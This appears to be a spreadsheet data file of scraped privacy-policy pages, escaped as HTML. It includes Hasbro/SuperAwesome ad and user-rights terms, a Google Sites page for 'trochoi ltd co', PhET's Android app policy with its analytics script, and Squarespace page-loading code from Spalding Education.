    <t>SuperAwesome temporarily receives limited information from your device to create a &amp;ldquo;Marker&amp;rdquo; that is a temporary, unique, one-way hashed value that cannot be reverse engineered to identify an individual. The Marker is used to deliver Ads without SuperAwesome or any third party storing other personal data of users, and to ensure a user does not receive the exact same contextual ad again and again. SuperAwesome may also retain a truncated and anonymized portion of the IP address to identify the general region of users without identifying any actual location.&lt;/li&gt;&lt;li&gt;</t>
  </si>
  <si>
    <t>AwesomeAds is:&lt;ul&gt;&lt;li&gt;certified as COPPA-compliant by the kidSAFE Seal Program, an FTC-Approved COPPA Safe Harbor Program. To learn more about the kidSAFE Seal Program, please go to &lt;a href="https://www.kidsafeseal.com" target="_blank"&gt;www.kidsafeseal.com&lt;/a&gt; for more information;&lt;/li&gt;&lt;li&gt;a valid licensee, and participating member, of the Entertainment Software Rating Board&amp;rsquo;s Privacy Certified Program. To learn more about this program, please go to &lt;a href="https://www.esrb.org/privacy-certified-seals" target="_blank"&gt;https://www.esrb.org/privacy-certified-seals&lt;/a&gt;;&lt;/li&gt;&lt;li&gt;a participant of the CARU&amp;reg; COPPA Safe Harbor Program.</t>
  </si>
  <si>
    <t>To learn more about this program, please go to &lt;a href="https://bbbprograms.org/programs/all-programs/children's-advertising-review-unit" target="_blank"&gt;https://bbbprograms.org/programs/all-programs/children&amp;#39;s-advertising-review-unit&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li&gt;SuperAwesome acts as a service provider, as defined by the CCPA, and does not use data collected from children under the age of 16 for any purpose other than to provide contextual advertising for our Apps.&lt;/li&gt;&lt;li&gt;Please see the AwesomeAds Privacy Policy (&lt;a href="https://www.superawesome.com/privacy-hub/awesomeads-privacy-policy/)" target="_blank"&gt;https://www.superawesome.com/privacy-hub/awesomeads-privacy-policy/&lt;/a&gt;) for more information. You may contact SuperAwesome directly at &lt;a href="mailto:privacy@superawesome.com"&gt;privacy@superawesome.com&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;h1&gt;12.Security&lt;/h1&gt;&lt;p&gt;We take appropriate technical and organisational measures designed to safeguard our users&amp;rsquo; personal information and regularly review our security measures in view of evolving risks and safeguards. Please note that no transmission over the internet can ever be guaranteed secure and we consequently cannot guarantee the security of any personal information that we receive over the Internet.&lt;/p&gt;&lt;p&gt;You must keep your password and any other authentication information for the Apps confidential.</t>
  </si>
  <si>
    <t>If you know or suspect that anyone other than you knows your password or any other authentication information, you must promptly notify us via the contact information below.&lt;/p&gt;&lt;h1&gt;13.Your rights&lt;/h1&gt;&lt;p&gt;We offer you certain choices about what information we collect from you, how we use and disclose the information, and how we communicate with you.&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;em&gt;Marketing Emails&lt;/em&gt;: If you have opted-in to marketing communications, we may contact you periodically via email or through other channels for the purpose of providing announcements, promotional information and/or other general communication. In order to improve our Apps, we may be notified when you open an email from us or click on a link therein. You may choose not to receive marketing emails from us by clicking on the unsubscribe link in the marketing emails you receive from us.</t>
  </si>
  <si>
    <t>Even if you opt out of receiving such communications, we may continue sending you non-marketing email communications, such as administrative or transaction alerts, or information about changes to our terms of service.&lt;/li&gt;&lt;li&gt;&lt;em&gt;Device settings&lt;/em&gt;: You device may enable you to disable certain permissions or functionality in our Apps (e.g., location); however, when necessary permissions or functionality are disabled, some features or functionality of our Apps may not function correctly.&lt;/li&gt;&lt;li&gt;&lt;em&gt;User Account&lt;/em&gt;: You may terminate your user account within an App&amp;rsquo;s account settings (where available) or by contacting us as provided below.</t>
  </si>
  <si>
    <t>We may retain any account information as necessary for internal purposes and as otherwise provided in this Privacy Policy and our Terms, to the extent permitted by applicable laws.&lt;/li&gt;&lt;li&gt;&lt;em&gt;Other rights regarding your information&lt;/em&gt;: You have the right in certain jurisdictions (including the EU/EEA, UK, Switzerland, Brazil, California) or under some app stores&amp;rsquo; terms to submit a privacy request in regard to your/your children&amp;rsquo;s personal information. These rights include: the right to withdraw consent or object to the processing of that information for certain purposes; the right to access, receive a copy, or correct that information; and the ability to erase that information.&amp;nbsp;&amp;nbsp;These rights can include: the right to access, rectify, or erase any personal data we have collected about you. You also have the right to data portability and the right to restrict or object to our processing or selling/sharing personal information we have collected about you.</t>
  </si>
  <si>
    <t>In addition, you have the right to ask us not to process your personal information (or provide it to third parties to process) for marketing purposes or purposes materially different than for which it was originally collected or subsequently authorized by you. You may withdraw your consent at any time for any data processing we do based on consent you have provided to us. Please note that we retain information as necessary to fulfil the purposes for which it was collected and may continue to retain and use information even after a data subject request for purposes of our legitimate interests, including as necessary to comply with our legal obligations, resolve disputes, prevent fraud, and enforce our agreements.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;We will respond to any such request to exercise your rights in accordance with applicable laws and app store rules, and any relevant legal exemptions.</t>
  </si>
  <si>
    <t>If you wish to exercise any of these rights, please contact us via the contact information below. To protect your privacy, we will require verification of your identity before fulfilling any request you make with respect to your personal information. You have a right to not be discriminated against for exercising your rights under applicable privacy laws, and we never discriminate in any way against users who exercise any of these rights.</t>
  </si>
  <si>
    <t>We may offer promotions or contests, and invite you to review such promotion or contest notices for details about the benefits, terms and conditions for such offers. We do not generally assign monetary value to users&amp;rsquo; personal information in connection with such activities we engage in.&lt;/p&gt;&lt;p&gt;If you have any issues concerning our compliance with your privacy rights, you may contact our Data Protection Officer at &lt;a href="mailto:DPO@hasbro.com"&gt;DPO@hasbro.com&lt;/a&gt;. You also have the right to</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="dxoEv49O7kIy3I8FydHUxA"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="dxoEv49O7kIy3I8FydHUxA"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="dxoEv49O7kIy3I8FydHUxA"&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0DGFcjyEgfiYzvwsCuc7bz-GWt_YFwstSxr0MObk5TLkM3isOaDFRR7WjSdjphchgli8WZ","je":1,"sstu":1681340325440792,"si":"CPXY4Oa4pf4CFQxyawodjUYIcQ","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747265,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,5786302,14101306,14101502,14101510,14101534,49369425,49372443,49375322,49376001,49378889,49451559,49453045,49472071,49474087,49512373,49622831,49623181,49624080,49644023,49648914,49654053,49700904,49703408,49765382,49816165,49822929,49823172,49824153,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762,50455861,50468091],"crc":0,"cvi":[]},"docs-ccdil":false,"docs-eil":true,"docs-eoi":false,"info_params":{},"atari-jefp":"/_/view/jserror","docs-jern":"view","atari-rhpp":"/_/view","docs-eeytpgc":true,"docs-feytpgc":false,"docs-ecuach":false,"docs-cclt":2033,"docs-ecci":true,"docs-esi":false,"docs-eytpgcv":0}; _docs_flag_cek= null ; if (window['DOCS_timing']) {DOCS_timing['ifdld']=new Date().getTime();}&lt;/script&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;&lt;meta name="referrer" content="origin"&gt;&lt;link rel="icon" href="https://ssl.gstatic.com/atari/images/public/favicon.ico"&gt;&lt;meta property="og:title" content="trochoi ltd co"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:url" content="https://sites.google.com/view/trochoi-ltd-co/"&gt;&lt;meta property="og:description" content="
This page is used to inform visitors regarding our policies with the collection, use, and disclosure of Personal Information if anyone decided to use our Service (apps and games).
 If you choose to use our Service, then you agree to the collection and use of information in relation to this policy.</t>
  </si>
  <si>
    <t>"&gt;&lt;meta itemprop="name" content="trochoi ltd co"&gt;&lt;meta itemprop="description" content="
This page is used to inform visitors regarding our policies with the collection, use, and disclosure of Personal Information if anyone decided to use our Service (apps and games).
 If you choose to use our Service, then you agree to the collection and use of information in relation to this policy.</t>
  </si>
  <si>
    <t>"&gt;&lt;meta itemprop="url" content="https://sites.google.com/view/trochoi-ltd-co/"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Lato%3A300%2C300italic%2C400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="CqmMGW3RE3cWVf0WeROlXg"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="CqmMGW3RE3cWVf0WeROlXg"&gt;&lt;link rel="stylesheet" href="https://www.gstatic.com/_/atari/_/ss/k=atari.vw.jffPnSbrV38.L.X.O/d=1/rs=AGEqA5liTY9eJ3KZzwxTWsMzfIyQn11GcQ" data-id="_cl" nonce="CqmMGW3RE3cWVf0WeROlXg"&gt;&lt;script nonce="dxoEv49O7kIy3I8FydHUxA"&gt;&lt;/script&gt;&lt;title&gt;trochoi ltd co&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="CqmMGW3RE3cWVf0WeROlXg"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color: rgba(34,110,147,1);}.JYVBee .OUGEr{color: rgba(34,110,147,1);}.OmQG5e .OUGEr{color:</t>
  </si>
  <si>
    <t>only screen and (min-width: 480px) and (max-width: 767px){.TMjjoe{font-size: 9pt;}}section[id="h.p_GfxArmuIzcFN"] .IFuOkc:before{opacity: 0.7;}&lt;/style&gt;&lt;script nonce="dxoEv49O7kIy3I8FydHUxA"&gt;_at_config =</t>
  </si>
  <si>
    <t>[null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL0DGFcjyEgfiYzvwsCuc7bz-GWt_YFwstSxr0MObk5TLkM3isOaDFRR7WjSdjphchgli8WZ",1,"CPXY4Oa4pf4CFQxyawodjUYIcQ",1681340325440792,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747265,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,5786302,14101306,14101502,14101510,14101534,49369425,49372443,49375322,49376001,49378889,49451559,49453045,49472071,49474087,49512373,49622831,49623181,49624080,49644023,49648914,49654053,49700904,49703408,49765382,49816165,49822929,49823172,49824153,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762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0,null,"v2beta",null,null,null,null,null,null,4,"https://accounts.google.com/o/oauth2/iframe",null,null,null,null,null,null,"https://2137462092-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https://sites.google.com/view/trochoi-ltd-co/",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[1681340325453,"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{"enableAnalytics":true,"webPropertyId":"","showDebug":false,"hashedSiteId":"97116011ef80eeefc98127475e1734ef09911aa7a8761366dda9d71ac044be86","normalizedPath":"view/trochoi-ltd-co/home","pageTitle":"Home"};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nonce="dxoEv49O7kIy3I8FydHUxA"&gt;&lt;/script&gt;&lt;script nonce="dxoEv49O7kIy3I8FydHUxA"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script nonce="dxoEv49O7kIy3I8FydHUxA"&gt;const</t>
  </si>
  <si>
    <t>imageUrl = 'https:\/\/lh6.googleusercontent.com\/Ia8HTZ-97IJ1ds_4DE8yb4JoihGm4PorHRy_KbsgNoNjAXnHsZJHTzbzDFfz0Uo3VYO97Q\x3dw16383';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data-sitename="trochoi-ltd-co" data-universe="1"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mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend: yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="GeGHKb" aria-label="Back to site" aria-disabled="false" tabindex="0" data-tooltip="Back to site" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"&gt;&lt;div class="VTBa7b MbhUzd" jsname="ksKsZd"&gt;&lt;/div&gt;&lt;span jsslot class="xjKiLb"&gt;&lt;span class="Ce1Y1c" style="top: -12px"&gt;&lt;svg class="V4YR2c" viewBox="0 0 24 24" focusable="false"&gt;&lt;path d="M0 0h24v24H0z" fill="none"/&gt;&lt;path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"/&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="E2UJ5" jsname="M6JdT"&gt;&lt;div class="rFrNMe b7AJhc zKHdkd" jscontroller="pxq3x" jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV" jsshadow jsname="OH0EC" aria-expanded="true"&gt;&lt;div class="aCsJod oJeWuf"&gt;&lt;div class="aXBtI I0VJ4d Wic03c"&gt;&lt;span jsslot class="A37UZe qgcB3c iHd5yb"&gt;&lt;div role="b</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"&gt;
&lt;head&gt;
  &lt;title&gt;PhET Simulations Android App Privacy Policy&lt;/title&gt;
  &lt;script type="text/javascript"&gt;
    //&lt;![CDATA [
    ( function( i, s, o, g, r, a, m ) {
      i.GoogleAnalyticsObject = r;
      i[ r ] = i[ r ] || function() {
        ( i[ r ].q =</t>
  </si>
  <si>
    <t>i [ r ].q || [] ).push( arguments );
      }, i[ r ].l = 1 * new Date();
      a = s.createElement( o ), m = s.getElementsByTagName( o )[ 0 ];
      a.async = 1;
      a.src = g;
      m.parentNode.insertBefore( a, m );
    } )( window, document, 'script', ( 'https:' === document.location.protocol ?</t>
  </si>
  <si>
    <t>'https:' : 'http:' ) + '//www.google-analytics.com/analytics.js', 'googleAnalytics' );
    window.googleAnalytics( 'create', {
      trackingId: 'UA-5033201-1',
      storage: 'none',
      cookieDomain: 'none'
    } );
    window.googleAnalytics( 'set', 'anonymizeIp', true );
    window.googleAnalytics( 'send', 'pageview' );
    window.googleAnalytics( 'create', {
      trackingId: 'UA-5033010-35',
      storage: 'none',
      cookieDomain: 'phet.colorado.edu',
      name: 'hewlett'
    } );
    window.googleAnalytics( 'hewlett.set', 'anonymizeIp', true );
    window.googleAnalytics( 'hewlett.send', 'pageview' );
    //]]&gt;
  &lt;/script&gt;
  &lt;!--  https://github.com/phetsims/website/issues/1266 --&gt;
  &lt;!-- Google tag (gtag.js) --&gt;
  &lt;script async src="https://www.googletagmanager.com/gtag/js?id=G-4EVJVBSTB9"&gt;&lt;/script&gt;
  &lt;script&gt;
    window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t>[];
    function gtag() {dataLayer.push( arguments );}
    gtag( 'js', new Date() );
    gtag( 'config', 'G-4EVJVBSTB9' );
  &lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;h1&gt;PhET Simulations Android App Privacy Policy&lt;/h1&gt;
  &lt;p&gt;Last updated: July 26, 2019&lt;/p&gt;
  &lt;p&gt;PhET Interactive Simulations and University of Colorado Boulder (“the CU PhET team”, “we”, or “us”) are deeply committed to protecting your
    privacy and creating a safe and secure environment for learners of all ages. This Privacy Policy applies to your use of the PhET Simulations
    Android app, and only the Android app. For information about use of PhET simulations and related resources on the PhET website, visit the PhET
    website.&lt;/p&gt;
  &lt;p&gt;</t>
  </si>
  <si>
    <t>In connection with your use of the PhET Simulations Android app, NO personally identifiable information is collected by the CU PhET team. The
    PhET Simulations Android app is meant to provide educational simulations to a wide audience. As we strive to collect the minimum amount of
    information needed to advance our educational mission, we have determined that there is no need for the collection of personal data within this
    app.&lt;/p&gt;
  &lt;p&gt;Some non-personally identifiable information is collected in order to ensure that the simulations are running correctly, and to report to funding
    agencies on the impact of the PhET simulations globally.</t>
  </si>
  <si>
    <t>Specifically, when you run a simulation, information is collected via Google Analytics’
    standard web statistics services, with flags to anonymize the IP address and to prevent Google Analytics from using cookies. In addition, we
    record an IP-anonymized log message to our servers that includes the following information: simulation name, simulation version, simulation
    language, timestamp, domain, URL, referrer, simulation type, type of device, and browser information. These statistics allow us to count the
    number of runs for each simulation, create reports on the usage of the simulations by language and country, and to distinguish app simulation runs
    from simulation runs on various websites.&lt;/p&gt;
  &lt;p&gt;We also have access to some standard aggregated data (e.g. sales, sessions, crashes) related to the PhET Simulations app that is provided to app
    developers through Google’s Play Console.</t>
  </si>
  <si>
    <t>However, we have NO access to any personally-identifiable information through this service.&lt;/p&gt;
  &lt;p&gt;If you have questions about this privacy policy, you may submit a written inquiry to &lt;a href="mailto:privacy@cu.edu"&gt;privacy@cu.edu&lt;/a&gt;.&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>brass-fennel-tzpt --&gt;
&lt;base href=""&gt;
&lt;meta charset="utf-8" /&gt;
&lt;title&gt;Privacy Policy &amp;mdash; Spalding Education&lt;/title&gt;
&lt;meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" /&gt;&lt;link rel="shortcut icon" type="image/x-icon" href="https://images.squarespace-cdn.com/content/v1/5b9b363c372b9691eba6582a/1540568435463-S6WPA1AU251YTOULAWSA/favicon.ico?format=100w"/&gt;
&lt;link rel="canonical" href="https://www.spaldingeducation.org/privacy-policy"/&gt;
&lt;meta property="og:site_name" content="Spalding Education"/&gt;
&lt;meta property="og:title" content="Privacy Policy &amp;mdash; Spalding Education"/&gt;
&lt;meta property="og:url" content="https://www.spaldingeducation.org/privacy-policy"/&gt;
&lt;meta property="og:type" content="website"/&gt;
&lt;meta itemprop="name" content="Privacy Policy — Spalding Education"/&gt;
&lt;meta itemprop="url" content="https://www.spaldingeducation.org/privacy-policy"/&gt;
&lt;meta name="twitter:title" content="Privacy Policy — Spalding Education"/&gt;
&lt;meta name="twitter:url" content="https://www.spaldingeducation.org/privacy-policy"/&gt;
&lt;meta name="twitter:card" content="summary"/&gt;
&lt;meta name="description" content="" /&gt;
&lt;link rel="preconnect" href="https://images.squarespace-cdn.com"&gt;
&lt;script type="text/javascript" src="//use.typekit.net/ik/klmUPg9V41J53-UFMqArdSQIF3sJAIknY2wiWTGZlKwfe0jIfFHN4UJLFRbh52jhWDmK5AJDFRFRwDSkjRqh5QB8jcIhFQ6kjs7dMkG0jAFu-WsoShFGZAsude80ZkoRdhXCHKoyjamTiY8Djhy8ZYmC-Ao1Oco8if37OcBDOcu8OfG0j14ySawlZcm0dcmCOWsESYb0SaBujW48Sagyjh90jhNlOfG0SaBujW48SagyjhmDjhy8ZYmC-Ao1OcFzdPUyjamTiY8Djhy8ZYmC-Ao1OcFzdPUyjamTiY8Djhy8ZYmC-Ao1Oco8ifUySkolZPUKScBDSkucZAo0ZA3liYT3ifoDSWmyScmDSeBRZPoRdhXCdeNRjAUGdaFXOYF3jAUq-Ao1ZAsujhBX-AN0OcNkZkUDSWmyScmDSeBRZWFR-emqiAUTdcS0jhNlOYiaikoyjamTiY8Djhy8ZYmC-Ao1OcFzdPUaiaS0jAFu-WsoShFGZAsude80Zko0ZWbCiaiaOcBDOcu8OYiaikoKScBDSkucZAo0ZA3liYT3ifoDSWmyScmDSeBRZPoRdhXCiaiaO1F3jAUq-Ao1ZAsujhBX-AN0OcNkZkUaiaS0SaBujW48SagyjhmDjhy8ZYmC-Ao1OcFzdPJwSY4zpe8ljPu0daZyJy4yZeNKZPu1jW4ydAN0Zfu3Scv7fbRKHyMMeMw6MKG4fHvgIMMjgfMfH6GJCwbgIMMjgPMfH6qJnbIbMg6eJMJ7fbKOMsMMeMS6MKG4fHtgIMMjIfMfH6qJRMIbMg6sJMJ7fbRDFgMgeMb6MKG4fVMXIMIjgkMfH6qJvRbbMs65JMJ7fbRUFgMgegI6MTMgKz2nc6j.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;try{Typekit.load();}catch(e){}&lt;/script&gt;
&lt;script type="text/javascript" crossorigin="anonymous" nomodule="nomodule" src="//assets.squarespace.com/@sqs/polyfiller/1.6/legacy.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" crossorigin="anonymous" src="//assets.squarespace.com/@sqs/polyfiller/1.6/modern.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;SQUARESPACE_ROLLUPS = {};&lt;/script&gt;
&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-af949235d15eedd394b42-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_runtime');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-af949235d15eedd394b42-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js =</t>
  </si>
  <si>
    <t>["//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_moment_js_vendor');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-cldr_resource_pack');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors_stable');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-vendors-4b49c51e5a53d327d3bd7-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-4b49c51e5a53d327d3bd7-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-b1495d1c475be529906af-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-b1495d1c475be529906af-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/performance-33cb1bd12b5d95b2bf5ae-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-performance');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/performance-33cb1bd12b5d95b2bf5ae-min.en-US.js" defer &gt;&lt;/script&gt;&lt;script data-name="static-context"&gt;Static = window. Static || {}; Static.SQUARESPACE_CONTEXT = {"facebookAppId":"314192535267336","facebookApiVersion":"v6.0","rollups":{"squarespace-announcement-bar":{"js":"//assets.squarespace.com/universal/scripts-compressed/announcement-bar-15e25160b942ba69bd3be-min.en-US.js"},"squarespace-audio-player":{"css":"//assets.squarespace.com/universal/styles-compressed/audio-player-702bf18174efe0acaa8ce-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/audio-player-4b71bc4da6232499a62d8-min.en-US.js"},"squarespace-blog-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/blog-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/blog-collection-list-44ab3d6f12cddbd366f28-min.en-US.js"},"squarespace-calendar-block-renderer":{"css":"//assets.squarespace.com/universal/styles-compressed/calendar-block-renderer-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/calendar-block-renderer-6f20ca9fe0574949433f3-min.en-US.js"},"squarespace-chartjs-helpers":{"css":"//assets.squarespace.com/universal/styles-compressed/chartjs-helpers-53c004ac7d4bde1c92e38-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/chartjs-helpers-aff2d23104600df085fdd-min.en-US.js"},"squarespace-comments":{"css":"//assets.squarespace.com/universal/styles-compressed/comments-cb7553e34a4da425817c4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/comments-8a4bd0618556454361bcc-min.en-US.js"},"squarespace-dialog":{"css":"//assets.squarespace.com/universal/styles-compressed/dialog-89b254b5c87045b9e1360-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/dialog-f21a7cbaebe1953fe6b68-min.en-US.js"},"squarespace-events-collection":{"css":"//assets.squarespace.com/universal/styles-compressed/events-collection-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/events-collection-9c7837f8e8c7ba99a4aa2-min.en-US.js"},"squarespace-form-rendering-utils":{"js":"//assets.squarespace.com/universal/scripts-compressed/form-rendering-utils-c2021593a39f94630ce20-min.en-US.js"},"squarespace-forms":{"css":"//assets.squarespace.com/universal/styles-compressed/forms-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/forms-0b66c608c373a540dab01-min.en-US.js"},"squarespace-gallery-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/gallery-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/gallery-collection-list-ccf378030ccbdb6e9f20a-min.en-US.js"},"squarespace-image-zoom":{"css":"//assets.squarespace.com/universal/styles-compressed/image-zoom-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/image-zoom-95bf63ca6dc7a85183665-min.en-US.js"},"squarespace-pinterest":{"css":"//assets.squarespace.com/universal/styles-compressed/pinterest-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/pinterest-a4e9fe29fb0c5c424e870-min.en-US.js"},"squarespace-popup-overlay":{"css":"//assets.squarespace.com/universal/styles-compressed/popup-overlay-948192219c3257f767ec5-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/popup-overlay-892e56d3c56aa8a20a99e-min.en-US.js"},"squarespace-product-quick-view":{"css":"//assets.squarespace.com/universal/styles-compressed/product-quick-view-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/product-quick-view-dc03b0386a20b1aabcb76-min.en-US.js"},"squarespace-products-collection-item-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-item-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-item-v2-13476485f63716e4af226-min.en-US.js"},"squarespace-products-collection-list-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-list-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-list-v2-86cb9526983c4269307f0-min.en-US.js"},"squarespace-search-page":{"css":"//assets.squarespace.com/universal/styles-compressed/search-page-9d0a55de1efafbb9218e1-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/search-page-152a6285d7507a88900be-min.en-US.js"},"squarespace-search-preview":{"js":"//assets.squarespace.com/universal/scripts-compressed/search-preview-8c25e422640fd7271eda1-min.en-US.js"},"squarespace-simple-liking":{"css":"//assets.squarespace.com/universal/styles-compressed/simple-liking-ef94529873378652e6e86-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/simple-liking-eec025f782ea0a61910bd-min.en-US.js"},"squarespace-social-buttons":{"css":"//assets.squarespace.com/universal/styles-compressed/social-buttons-1f18e025ea682ade6293a-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/social-buttons-a2f5c0c402abbb48429cb-min.en-US.js"},"squarespace-tourdates":{"css":"//assets.squarespace.com/universal/styles-compressed/tourdates-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/tourdates-7d67f0a3c7d60a20f001d-min.en-US.js"},"squarespace-website-overlays-manager":{"css":"//assets.squarespace.com/universal/styles-compressed/website-overlays-manager-7cecc648f858e6f692130-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/website-overlays-manager-